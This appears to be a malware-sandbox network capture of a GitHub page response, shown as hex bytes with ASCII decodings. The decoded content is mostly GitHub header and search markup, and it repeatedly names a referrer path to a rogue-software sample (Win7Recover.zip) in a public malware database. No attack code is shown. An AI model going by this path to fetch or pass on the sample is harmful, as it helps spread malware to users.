                                                                                                        2022-09-29 12:46:50 UTC16088INData Raw: 6b 20 74 6f 20 67 6f 20 74 6f 20 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 69 74 68 75 62 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42
                                                                                                        Data Ascii: k to go to Documentation&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Documentation;&quot;}" href="https://docs.github.com"> Documentation <svg aria-hidden="true" height="16" viewB
                                                                                                        2022-09-29 12:46:50 UTC16089INData Raw: 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 2e 36 30 34 20 31 68 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 34 32 37 2e 31 37 37 4c 31 33 2e 30 33 20 34 2e 30 33 20 39 2e 32 38 20 37 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 6c
                                                                                                        Data Ascii: width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path fill-rule="evenodd" d="M10.604 1h4.146a.25.25 0 01.25.25v4.146a.25.25 0 01-.427.177L13.03 4.03 9.28 7.78a.75.75 0 01-1.06-1.06l
                                                                                                        2022-09-29 12:46:50 UTC16090INData Raw: 30 32 20 33 2e 37 35 76 38 2e 35 63 30 20 2e 39 36 36 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 20 31 2e 37 35 68 38 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 20 31 32 2e 32 35 76 2d 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 31 2e 35 20 30 76 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 68 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 76 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 30 2d 31 2e 35 68 2d 33 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 0a 0a 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: 02 3.75v8.5c0 .966.784 1.75 1.75 1.75h8.5A1.75 1.75 0 0014 12.25v-3.5a.75.75 0 00-1.5 0v3.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25v-8.5a.25.25 0 01.25-.25h3.5a.75.75 0 000-1.5h-3.5z"></path></svg></a></li> </ul> </div></li>
                                                                                                        2022-09-29 12:46:50 UTC16092INData Raw: 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 45 6e 74 65 72 70 72 69 73 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26
                                                                                                        Data Ascii: own-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to Enterprise&quot;,&quot;label&quot;:&
                                                                                                        2022-09-29 12:46:50 UTC16093INData Raw: 6f 6e 65 20 66 35 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 70 62 2d 33 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 68 34 20 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 6d 79 2d 31 22 3e 42 79 20 53 6f 6c 75 74 69 6f 6e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74
                                                                                                        Data Ascii: one f5 border-bottom pb-3 mb-3"> <li class="h4 color-fg-default my-1">By Solution</li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analyt
                                                                                                        2022-09-29 12:46:50 UTC16094INData Raw: 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 44 65 76 4f 70 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63
                                                                                                        Data Ascii: lank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to DevOps&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_c
                                                                                                        2022-09-29 12:46:50 UTC16096INData Raw: 2f 72 65 73 6f 75 72 63 65 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 64 65 76 6f 70 73 2f 66 75 6e 64 61 6d 65 6e 74 61 6c 73 2f 64 65 76 73 65 63 6f 70 73 2f 22 3e 0a 20 20 20 20 20 20 44 65 76 53 65 63 4f 70 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d
                                                                                                        Data Ascii: /resources.github.com/devops/fundamentals/devsecops/"> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-
                                                                                                        2022-09-29 12:46:50 UTC16097INData Raw: 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 52 65 73 6f 75 72 63 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d
                                                                                                        Data Ascii: position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to Resources&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/M
                                                                                                        2022-09-29 12:46:50 UTC16099INData Raw: 74 65 72 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 6a 73 2d 64 65 74 61 69 6c 73 2d 74 61 72 67 65 74 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 4f 70 65 6e 20 53 6f 75 72 63 65 0a 20 20 20 20 20 20 3c 73 76 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 48 65 61 64 65 72
                                                                                                        Data Ascii: ter flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down Header
                                                                                                        2022-09-29 12:46:50 UTC16100INData Raw: 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 4f 70 65 6e 20 53 6f 75 72 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75
                                                                                                        Data Ascii: <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Open Source&quot;,&quot;action&qu
                                                                                                        2022-09-29 12:46:50 UTC16101INData Raw: 6f 75 74 29 2c 20 4f 70 65 6e 20 53 6f 75 72 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 54 72 65 6e 64 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 54 72 65 6e 64 69 6e 67 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 74 72 65 6e 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 54 72 65 6e 64 69 6e 67 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20
                                                                                                        Data Ascii: out), Open Source&quot;,&quot;action&quot;:&quot;click to go to Trending&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Trending;&quot;}" href="/trending"> Trending </a></li>
                                                                                                        2022-09-29 12:46:50 UTC16103INData Raw: 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 78 2d 33 20 70 78 2d 6c 67 2d 30 20 6d 62 2d 33 20 6d 62 2d 6c 67 2d 30 20 74 65 78 74 2d 63 65 6e 74 65 72 20 74 65 78 74 2d 6c 67 2d 6c 65 66 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 6c 67 2d 66 6c 65 78 20 6d 69 6e 2d 77 69 64 74 68 2d 30 20 6d 62 2d 32 20 6d 62 2d 6c 67 2d 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 0a 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 73 65 61 72 63 68 20 66 6c 65 78 2d 61 75 74 6f 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 6a 73 2d 73 69 74
                                                                                                        Data Ascii: </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-sit
                                                                                                        2022-09-29 12:46:50 UTC16104INData Raw: 20 20 72 6f 6c 65 3d 22 63 6f 6d 62 6f 62 6f 78 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 22 6c 69 73 74 62 6f 78 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6c 69 73 74 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 6a 75 6d 70 2d 74 6f 2d 72 65 73 75 6c 74 73 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 3d 22 2f 5f 67 72 61 70 68 71 6c 2f 47 65 74 53 75 67 67 65 73 74 65 64 4e
                                                                                                        Data Ascii: role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedN
                                                                                                        2022-09-29 12:46:50 UTC16105INData Raw: 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 70 61 74 68 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6f 70 65 6e 20 70 2d 32 22 20 68 72 65 66 3d 22 22 20 64 61 74 61 2d 69 74 65 6d 2d 74 79 70 65 3d 22 73 75 67 67 65 73 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72 2d 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 64 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 52 65 70 6f 73 69 74 6f 72
                                                                                                        Data Ascii: jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="suggestion"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repositor
                                                                                                        2022-09-29 12:46:50 UTC16107INData Raw: 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2d 2e 37 35 7a 6d 2d 38 2e 32 35 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 35 20 30 76 35 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 35 2e 35 7a 4d 38 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 33 2e 35 41 2e 37 35 2e 37 35 20 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d
                                                                                                        Data Ascii: 5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version=
                                                                                                        2022-09-29 12:46:50 UTC16108INData Raw: 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 64 2d 6f 6e 2d 6e 61 76 2d 66 6f 63 75 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 6a 75 6d 70 22 3e 0a 20 20 20 20 20 20 4a 75 6d 70 20 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 3c 2f 75 6c 3e 0a 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 20 6a 73 2d
                                                                                                        Data Ascii: "border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle"></span> </div> </a></li></ul><ul class="d-none js-
                                                                                                        2022-09-29 12:46:50 UTC16109INData Raw: 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 37 32 20 31 2e 30 35 41 32 2e 34 39 35 20 32 2e 34 39 35 20 30 20 30 31 32 20 31 31 2e 35 76 2d 39 7a 6d 31 30 2e 35 2d 31 56 39 68 2d 38 63 2d 2e 33 35 36 20 30 2d 2e 36 39 34 2e 30 37 34 2d 31 20 2e 32 30 38 56 32 2e 35 61 31 20 31 20 30 20 30 31 31 2d 31 68 38 7a 4d 35 20 31 32 2e 32 35 76 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2e 32 6c 31 2e 34 35 2d 31 2e 30 38 37 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 33 20 30 4c 38 2e 36 20 31 35 2e 37 61 2e 32 35 2e 32 35 20 30 20 30 30
                                                                                                        Data Ascii: 12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00
                                                                                                        2022-09-29 12:46:50 UTC16111INData Raw: 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 61 76 61 74 61 72 20 64 2d 6e 6f 6e 65 22 20 61 6c 74 3d 22 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 61 6d 22 20 73 72 63 3d 22 22 20 77 69 64 74 68 3d 22 32 38 22 20 68 65 69 67 68 74 3d 22 32 38 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f
                                                                                                        Data Ascii: .75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestio
                                                                                                        2022-09-29 12:46:50 UTC16112INData Raw: 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6f 70 65 6e 20 70 2d 32 22 20 68 72 65 66 3d 22 22 20 64 61 74 61 2d 69 74 65 6d 2d 74 79 70 65 3d 22 6f 77 6e 65 72 5f 73 63 6f 70 65 64 5f 73 65 61 72 63 68 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72 2d 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 64 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36
                                                                                                        Data Ascii: s-navigation-open p-2" href="" data-item-type="owner_scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16
                                                                                                        2022-09-29 12:46:50 UTC16113INData Raw: 2e 35 20 30 76 35 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 35 2e 35 7a 4d 38 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 33 2e 35 41 2e 37 35 2e 37 35 20 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 